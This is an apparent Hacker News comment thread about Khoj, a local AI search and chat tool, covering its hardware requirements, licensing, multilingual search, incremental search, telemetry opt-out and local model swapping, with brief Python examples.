Hey ubertaco! I remember you. Appreciate the well-wishes. The landing page still needs some tweaking. It's kind of hard keeping what you're building in sync with what you're aspiring for, but we're definitely working towards it.
Interesting. The obvious question you haven't answered anywhere (as far as I can see) is what are the hardware requirements to run this locally?
Ah, you're right, forgot to mention that. We use the Llama 2 7B 4 bit quantized model. The machine requirements are:
Ideal: 16 GB (GPU) RAM
Less ideal: 8 GB RAM and CPU only
Feedback for landing page: use a fixed-height container for the example prompts. Without it, the page jumps while scrolling, making other sections hard to read. (iOS Safari)
Thanks for the feedback! Someone else mentioned this issue the other day as well. I'll fix this issue on the landing page soon
This would be even great if available as a Spotlight Search replacement (with some additional features that Spotlight supports).
Yeah, this would be ideal for Mac users. Just need to look into what is required and how much work it is
Two comments
1. If you want better adoption, especially among corporations, GPL-3 won't cut it. Maybe think of some business-friendly licenses (MIT, etc.)
2. I understand the excitement about LLMs. But how about making something more accessible to people with regular machines and not state-of-the-art hardware? I use ripgrep-all (rga) along with fzf [1], which can search all files, including PDFs, in specific folders. However, I would like a GUI tool to
(a) search across multiple folders,
(b) provide priority of results across folders, filetypes and
(c) store search histories where I can do a meta-search.
This is sufficient for 95% of my use cases for local search, and I don't need an LLM. If khoj can enable such search by default without an LLM, that will be a gamechanger for many people without a heavy compute machine or who don't want to use OpenAI.
[1] https://github.com/phiresky/ripgrep-all/wiki/fzf-Integration
That seems like a pretty trivial thing to implement. Why not do it yourself?
If corporations have no issue with using restrictive proprietary licenses, they should not have any issues with the GPL.
Just a note to suggest that giving away your hard work to those who will profit from it in the hope that they will remember you later seems like a pretty dubious exchange.
Have a look at how that worked out for the folks who built node and its libraries versus the ones who maintained control of their work (like npm).
Hi, my dream app! Will it work on non-English sources?
To use Chat with non-english sources you'll need to enable OpenAI. Offline chat with Llama 2 can't do that yet.
And Search can be configured to work with 50+ languages.
You'll just need to configure the asymmetric search model khoj uses to paraphrase-multilingual-MiniLM-L12-v2 in your ~/.khoj/khoj.yml config file
For setup details see http://docs.khoj.dev/#/advanced?id=search-across-different-l...
Really cool to see this! Local is the real future of AI.
I got really excited about this and fired it up on my petite little M2 MacBook Air, only for it to grind to a halt. Think the old days when you had a virus on your PC and you'd move the mouse then wait 45 seconds to see the cursor move. It honestly made me feel nostalgic. I guess I have to temper performance expectations with this Air, though this is the first time it's happened.
This is very cool, the Obsidian integration is a neat feature.
Please, someone make a home-assistant Alexa clone for this.
Thanks!
We've just been testing integrations over voice and WhatsApp over the last few days[1][2] :)
[1]: https://github.com/khoj-ai/khoj/tree/khoj-chat-over-whatsapp...
[2]: https://github.com/khoj-ai/khoj/compare/master...features/wh...
Would anybody be able to recommend a standalone solution (essentially, data must not leave my machine) to chat with documents through a web interface?
I tried privategpt but results were not great.
Khoj provides exactly that; it runs on your machine, none of your data leaves your machine, and it has a web interface for chat.
Cool project. I tried it last time this got posted, but it was still a bit buggy. Giving it another shot - I'm mainly interested in the local chat.
Could you elaborate on the incremental search feature? How did you implement it? Don't you need to re-encode the full query through SBERT or similar as each token is typed (perhaps with debouncing)?
Also, having an easily-extended data connector interface would be awesome, to connect to custom data sources.
Buggy during setup? We've made some improvements and now have desktop apps (in beta) too, to simplify this. Feel free to report any issues on the Khoj GitHub; I can have a look.
Yes, we don't do any optimizations on the query encoding yet, so SBERT just re-encodes the whole query every time. It returns results in <100ms, which is good enough for incremental search.
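Roughly, the hot path looks like this. A simplified sketch with sentence-transformers, not Khoj's actual code; the model name and corpus are placeholders:
# Re-encode the whole (partial) query on each keystroke and rank a
# pre-encoded corpus by cosine similarity.
from sentence_transformers import SentenceTransformer, util

model = SentenceTransformer("sentence-transformers/multi-qa-MiniLM-L6-cos-v1")  # placeholder bi-encoder
corpus = ["note on taxes", "trip to Lisbon", "llama 2 setup"]                   # placeholder entries
corpus_embeddings = model.encode(corpus, convert_to_tensor=True)                # done once, at index time

def incremental_search(partial_query: str, top_k: int = 3):
    # A single query encode takes tens of milliseconds on CPU,
    # which keeps each keystroke under the ~100ms budget mentioned above.
    query_embedding = model.encode(partial_query, convert_to_tensor=True)
    scores = util.cos_sim(query_embedding, corpus_embeddings)[0]
    ranked = sorted(zip(corpus, scores.tolist()), key=lambda x: x[1], reverse=True)
    return ranked[:top_k]

for prefix in ("lla", "llama set", "llama 2 setup notes"):   # simulating keystrokes
    print(prefix, "->", incremental_search(prefix)[0][0])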
I did create a plugin system, so a data plugin just has to convert the source data into a standardized intermediate JSONL format. But this hasn't been documented or extensively tested yet.
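As an illustration only (since the format isn't documented yet, the field names here are hypothetical and may not match Khoj's actual schema), a plugin's output would be one JSON object per line, something like:
import json

# Hypothetical shape of a single intermediate JSONL entry a plugin might emit.
entry = {
    "raw": "* Meeting notes\nDiscussed the Q3 roadmap...",     # original snippet
    "compiled": "Meeting notes. Discussed the Q3 roadmap...",  # text to embed
    "file": "~/notes/work.org",                                # source location
}
print(json.dumps(entry))   # one line per entry -> .jsonl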
It's funny that you mention `C-s`, because `isearch-forward` is usually used for low-latency literal matches. In what workflow can Khoj offer acceptable latency or superior utility as a drop-in replacement for isearch? Is there an example of how you might use it to navigate a document?
That's (almost) exactly what Khoj search provides: a search-as-you-type experience, but with a natural language (instead of keyword) search interface.
My workflow looks like:
1. Search with Khoj search[1]: `C-c s s` <search-query> RET
2. Use speed keys to jump to the relevant entry[2]: e.g. `n n o 2`
[1]: `C-c s` is bound to the `khoj` transient menu
[2]: https://orgmode.org/manual/Speed-Keys.html
What's the posthog telemetry used for? Why is there nothing on it in the docs? Why no clear way to opt out?
It's pretty easy to remove, which is what I ended up doing. The project works remarkably well otherwise.
Thanks for pointing that out!
We use it to understand usage, like determining whether people are using markdown or org more.
Everything collected is fully anonymized, and no identifiable information is ever sent to the telemetry server.
To opt out, set the `should-log-telemetry` value in `khoj.yml` to false. I've updated the docs to include these instructions and what we collect: https://docs.khoj.dev/#/telemetry.
I see you're using gpt4all; do you have a supported way to change the model being used for local inference?
A number of apps that are designed for OpenAI's completion/chat APIs can simply point to the endpoints served by llama-cpp-python [0], and function in (largely) the same way, while using the various models and quants supported by llama.cpp. That would allow folks to run larger models on the hardware of their choice (including Apple Silicon with Metal acceleration or NVIDIA GPUs) or using other proxies like openrouter.io. I enjoy openrouter.io myself because it supports Anthropic's 100k models.
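For example, here is a rough sketch of that pattern, assuming the server was started with `python -m llama_cpp.server --model <path-to-model>` and is listening on its default localhost:8000; it uses the OpenAI v1-style Python client:
from openai import OpenAI

client = OpenAI(
    base_url="http://localhost:8000/v1",   # llama-cpp-python's local OpenAI-compatible endpoint
    api_key="unused-locally",              # typically not checked by a local server
)
reply = client.chat.completions.create(
    model="local",   # most local servers ignore or loosely match this name
    messages=[{"role": "user", "content": "Summarize my notes on licensing."}],
)
print(reply.choices[0].message.content)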
No, we don't yet. Lots of developer folks want to try different models, but we want to provide simple-to-use yet deep assistance, and we're unsure what to focus on given our limited resources.
The point of gpt4all is that you can change the model with minimal breakage. You should be able to change this line https://github.com/khoj-ai/khoj/blob/master/src/khoj/process... to the model you want. You'll need to build your own local image with docker-compose, but it should be relatively straightforward.
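For reference, the swap amounts to roughly this in the gpt4all Python bindings; the model name below is just an example and may not match what Khoj ships with, and Khoj's wrapper may pass extra options:
from gpt4all import GPT4All

# Any model name from the gpt4all catalog (or a local path) can go here.
model = GPT4All("orca-mini-3b.ggmlv3.q4_0.bin")
print(model.generate("Say hello in one sentence."))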
Has anyone gotten something valuable out of talking to their second brain? What kinds of conversations?
It looks like they do not care whether they have consensus or approval for WEI; they are implementing it regardless.
Wherever you live, you should contact your government representatives and regulators and put a spotlight on this issue for what it is: a monopoly abusing its power.
Grassroots efforts are great and it is good to let your friends, family, and associates know what they are doing and why it is wrong. However, government regulation of this abuse is needed to stop it by force of law.